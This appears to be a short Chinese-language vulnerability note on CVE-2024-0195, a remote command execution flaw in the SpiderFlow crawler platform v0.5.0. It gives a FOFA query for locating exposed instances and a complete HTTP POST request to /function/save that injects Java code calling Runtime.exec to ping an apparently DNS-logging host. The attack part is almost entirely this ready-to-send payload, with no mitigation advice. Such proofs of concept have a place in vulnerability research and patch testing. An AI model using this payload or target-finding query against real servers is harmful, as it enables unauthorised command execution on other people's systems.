# SpiderFlow爬虫平台存在远程命令执行漏洞（CVE-2024-0195）

# 一、漏洞简介
SpiderFlow是新一代开源爬虫平台，以图形化方式定义爬虫流程，不写代码即可完成爬虫。基于springboot+layui开发的前后端不分离,也可以进行二次开发。该系统/function/save接口存在RCE漏洞，攻击者可以构造恶意命令远控服务器。

# 二、影响版本
+ SpiderFlow爬虫平台 v0.5.0

# 三、资产测绘
+ fofa`app="spiderflow"`
+ 特征

![1725588617253-d0956560-866d-4745-b3bf-b6c473dd9551.png](./img/OjWEtwl7z1fS0Qxs/1725588617253-d0956560-866d-4745-b3bf-b6c473dd9551-660786.png)

# 四、漏洞复现
```java
POST /function/save HTTP/1.1
Host: 
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 142

id=&name=test&parameter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+nccrflrlvu.yutu.eu.org')%3B%7B
```

![1725588674894-0c5cdc42-26f7-472d-9bd8-afb2199f8abf.png](./img/OjWEtwl7z1fS0Qxs/1725588674894-0c5cdc42-26f7-472d-9bd8-afb2199f8abf-550132.png)



> 更新: 2024-10-22 09:36:10  
> 原文: <https://www.yuque.com/xiaokp7/ocvun2/obeii8pkzzb4154z>